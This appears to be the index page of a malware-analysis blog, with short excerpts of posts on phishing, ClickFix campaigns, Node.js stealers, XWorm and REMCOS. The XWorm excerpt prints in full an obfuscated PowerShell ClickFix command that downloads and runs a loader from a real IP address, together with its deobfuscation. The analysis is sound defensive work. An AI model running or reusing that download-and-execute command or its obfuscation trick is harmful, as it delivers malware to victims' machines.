I recently analyzed the following phishing email. It contains a Microsoft account harvester and has some interesting anti-analysis functions. I didn’t do a full dive on it, but there’s some interesting stuff here.
Examining the email in a text editor revealed that the headers had been manipulated.
The QR code image was extracted from the email via the Base64 encoded string object. This was put into CyberChef for rasterization and analysis.
Read more...A user received a phishing email that redirected the to hxxps[://]popthecard[.]pages[.]dev. This page claimed that a friend had sent an invitation, and that the user must download and open it on a windows laptop or desktop to view it. The page automatically downloaded the file VelvetPaperCo.exe (in similar incidents, invitation.exe).
The page itself is rather basic, with the following JavaScript code handling the download function. It simply sets a timeout and executes a function that reaches out to a public CloudFlare R2 bucket that hosts the malicious RMM installer.
Read more...With the rise of AI, Vibe-Coded malware is now an existing threat. Sort of? In the way that a wet noodle could potentially kill you in the right circumstances, Vibe-Coded malware could also pose a threat. It’s just very unlikely. At least, with the current iterations out there.
Enter what I’m calling “Baby’s first malware” AKA “Fisher-Price Malware”. A Vibe-Coded sample found on a users’ device. It’s an “obfuscated” PowerShell loader that pulls a payload that… takes screenshots and uploads them? Kind of? Technically, it works. Sometimes. In perfect conditions.
Read more...Slides from BSides TC 2025 talk.
Node.js is commonly used to deploy stealers on devices. Often, these incidents include WebView2 applications bundled into InnoSetup installers. These installers use custom scheduled task XML configurations to deploy tasks that run malcious Node.js scripts on the host device. Also referred to as EvilAI - TrendMicro
The linked article does a great job of breaking these down. They’re essentially .net assemblies that use WebView2 and AI-generated “web applications” (read vibe-coded html pages). These applications are bundled into an InnoSetup installer with node and a malicious script. When the installer runs, it sets up a scheduled task to execute the node script. The user only sees the intended “legitimate” AI web app get installed.
Read more...On Saturday, Spetember 20th, 2025, A user visited a compromised domain serving a malicious redirect to a ClickFix campaign page. This campaign utilized a dynamic ClickFix template that builds legitimate appearing captcha turnstiles based on passed parameters. This specific ClickFix template has been covered in the article ClickFix - The RAT that almost got away. The campaign attempted to deliver a NetSupport RAT via a PowerShell loader. This loader is also a part of the kit, but some minor changes have occured between the previous incidents and this current campaign.
Read more...I came across an interesting program yesterday. A user had downloaded a “calendar” application that had flagged our EDR product. I pulled the History file from the user’s browser, found the download URL, and grabbed a copy of it for analysis.
The binary came as a 7-Zip Self-Extracting Executable. Extracting it revealed it was a NeutralinoJS application. NeutralinoJS is a replacement/alternative to electron. It combines HTML, CSS, and JavaScript into a single webview 2 based desktop application. It also packs the code and resources into a .neu file that is bundled into the 7-Zip SFX. This means you can easily view the source code for any NeutralinoJS application without much work.
Read more...NOTE: Quick and dirty upload of some notes from an XWorm sample.
The user visited hxxps[://]portal-secure[.]com on Sep. 9, 2025 at 7:49:27.978. This domain served a malicious ClickFix page instructing the user to execute code via Win+R.
The ClickFix domain copied the following code to the user’s clipboard:
POWERSHELL "FUNCTION YES { &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) };$FF='HSJDUFERIKFOLDJRKMOXSDH';$DD=$FF[8]+$FF[7]+$FF[17];$SS=$FF[8]+$FF[6]+$FF[19]; YES"
# Deobfuscated
FUNCTION YES {
&$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) # 77.83.207.225/x.jpg
};
$FF='HSJDUFERIKFOLDJRKMOXSDH';
$DD=$FF[8]+$FF[7]+$FF[17]; #IRM
$SS=$FF[8]+$FF[6]+$FF[19]; #IEX
# IEX (IRM 77.83.207.225/x.jpg)
The ClickFix PowerShell code was first executed on Sep. 9, 2025 at 7:50:30.859. This code pulls a loader named x.jpg from the 77[.]83[.]207[.]225 address. Analysis of this address located it in Moscow, Russia.
A fun thing about WSL 2, is that it is fully capable of calling windows native functions and binaries. It also has cron. Which opens the opportunity to do some interesting things to someone’s unattended device.
Take this MSHTA execution for example. It’s a simple SAPI call made in JavaSCript. All it does is use SAPI to say “hello”. I’ve had a lot of fun in the past with various SAPI-based jokes, and this is a pretty straight forward way to do this.
Read more...Side note: This malware sample was originally analyzed on 07-30-2025. I was just lazy and didn’t get the post up until today. Dates in the analysis will reflect the 07/30 analysis date. This is also a really lazy writeup.
The initial incident was observed by Point Wild’s Threat Intelligence team Report Here.
This report covers the analysis of the sample and attack chain. Check it out, it’s a good write up. However, from the publicly available reporting at the time of original analysis, there was no information on the injection of SndVol.exe as a method for loading the REMCOS payload.
Read more...